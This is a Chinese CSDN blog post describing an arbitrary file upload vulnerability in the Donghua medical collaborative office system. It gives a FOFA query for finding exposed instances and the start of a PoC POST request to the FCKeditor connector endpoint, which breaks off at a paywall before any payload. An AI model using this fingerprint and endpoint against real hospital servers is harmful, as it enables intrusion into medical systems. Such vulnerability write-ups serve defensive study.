东华医疗协同办公系统 文件上传漏洞复现

已于 2023-12-29 16:15:29 修改
阅读量1.5k 收藏 8
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-29 16:13:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135293433
版权
本文介绍了东华医疗协同办公系统存在的文件上传漏洞,详细阐述了漏洞概述,提供复现环境及PoC,并给出了修复建议,旨在帮助用户理解和防止此类安全风险。
摘要由CSDN通过智能技术生成

0x01 产品简介

东华医疗协同办公系统是一种专为医疗机构设计的协同办公解决方案。该系统旨在提升医疗机构内部的工作效率和沟通协作能力,促进医务人员之间的信息共享和协同工作。

0x02 漏洞概述

东华医疗协同办公系统 connector接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:body="/skin/charmBlue/css/dialog.css"

0x04 漏洞复现

PoC

POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1qdEWTI01cj5BLV
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
漏洞复现东华**协同办公系统反序列化漏洞
weixin_45530380的博客
01-03 815
@d_base64>参数中 base64编码为内存马payload。
漏洞复现东华医疗协同办公系统文件上传漏洞
weixin_45530380的博客
01-02 1457
【代码】【漏洞复现东华医疗协同办公系统文件上传漏洞
医药公司登录系统任意文件上传漏洞
2301_77012231的博客
06-21 928
医药公司登录系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。该系统支持前台零售、批发销售、销售审核等多种销售方式,并具备完善的客户档案管理功能,包括客户的基本信息、经营权限等。此外,系统还提供国药标准药品字典库云下载功能,便于用户快速获取药品信息。整体而言,医药公司登录系统通过自动化的管理和数据分析,帮助医药企业优化业务流程,提升市场竞争力。
OA系统漏洞记录
Aquarius_ego的博客
05-14 4815
OA系统介绍及相关漏洞(不断更新哦~)
东华软件反统方:一个能扼住医疗信息泄露咽喉的解决方案
weixin_34365635的博客
08-01 697
【51CTO.com原创稿件】在很多IT厂商眼中,医疗行业是一个让人既爱又怵的香饽饽:这个市场蕴藏着庞大的待开发IT商机,然而倘若没有对这个行业的特殊性有着深入理解,就无法制定出令用户满意的解决方案。正所谓危机与商机并存,遗憾的是不少IT厂商都在医疗行业沉戟落沙。 东华软件算是活跃在医疗行业的老牌IT厂商了,进入医疗行业市场已经有10年之久,对这个行业信...
Caché 为什么在医疗系统中吐槽
HONEY MOOSE
02-11 999
目前所知的 Caché 是应用在医院信息系统(即 HIS),据说在欧美医疗卫生行业,Caché 占了 70% 的市场份额。国内的东华软件就是采用 Caché 数据库,东华软件在国内医院市场占有率大致为 20%,其中包括北京协和医院、四川大学华西医院等。Caché 的特点:多维数据库架构,后关系型数据库,自带开发环境,完全面向对象。抛开上面说的这些不说,除了因为医疗系统的封闭之外我实在是想不出有什么理由能够在医疗系统中长期运行这么多年。在现在的设计来看,全是缺点,没有亮点。
东华软件智慧医疗解决方案.pptx
05-23
智慧医疗致力于打造个人健康管理的服务平台,为终端用户和医疗机构之间搭建起沟通的桥梁。 平台的一侧整合现有的医疗资源,提供专业医疗健康服务;另一侧是终端用户,他们可灵活地通过无线或有线的方式接入,实时...
东华医疗软件系统集成解决方案(RIS 部分)(3) 2.doc
08-10
东华医疗软件系统集成解决方案(RIS 部分)》文档主要阐述了东华医疗软件在集成RIS(Radiology Information System,放射科信息系统)时的技术规范和业务流程,旨在确保系统间交互的稳定性和实时性。以下是文档中...
东华数字医疗解决方案
11-27
东华数字医疗解决方案,详细介绍东华软件的医疗信息系统解决方案
东华大学操作系统-罗辛
09-23
上课时根据视频和课件整理出来的思维导图,之后还做了一些增添和删改,分享出来给大家,不知道说啥了,给大家拜个早年
HIS系统东华、天健表结构及实施计划
07-08
东华和天健是两家在中国医疗信息化领域知名的供应商,它们提供的HIS系统在行业内有着广泛的应用。下面我们将深入探讨HIS系统的基础知识,特别是东华和天健的表结构以及实施计划。 一、HIS系统概述 HIS系统主要包括...
Linux安全与高级应用(十三)深入解析Linux中的rsync远程同步:原理、配置与应用
洛秋的博客
08-13 584
1.1 rsync的基本原理rsync(Remote Sync)是一种用于本地或远程的文件同步工具。与传统的文件拷贝工具不同,rsync的核心优势在于其增量同步的特性,即只传输源和目标之间不同的文件部分,极大地减少了数据传输量。rsync支持通过SSH或直接使用rsync协议进行数据同步,这使得它在跨网络的大数据备份中表现尤为出色。1.2 rsync的优势增量备份:只同步差异文件或文件的变化部分,大幅减少网络传输量和时间。安全性:通过SSH加密通道进行传输,保障数据的安全。灵活性。
在亚马逊云科技上安全、合规、私密地调用生成式AI大模型
m0_66628975的博客
08-13 1894
Amazon Bedrock 是亚马逊云科技提供的一项服务,旨在帮助开发者轻松构建和扩展生成式 AI 应用。Bedrock 提供了访问多种强大的基础模型(Foundation Models)的能力,支持多种不同大模型厂商的模型,如AI21 Labs, Anthropic, Cohere, Meta, Mistral AI, Stability AI, 和Amazon,用户可以使用这些模型来创建、定制和部署各种生成式 AI 应用程序,而无需从头开始训练模型。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 290
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
安全无忧!Windows7全补丁旗舰版:集成所有补丁!
lihuiyun184291的博客
08-13 313
今日,系统之家小编给大家分享集成所有补丁的Windows7旗舰版系统,集成至2023.12所有官方补丁,修复了系统高危漏洞,让大家时刻都能舒心地展开操作。系统基于微软 Windows 7 2009 SP1 旗舰版进行离线制作,全新升级的优化方案,系统性能更好,运作更加流畅,且系统安装步骤简单易懂,支持硬盘安装。
企业如何组建安全稳定的跨国通信网络
最新发布
TIANGEKUAJING的博客
08-13 145
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值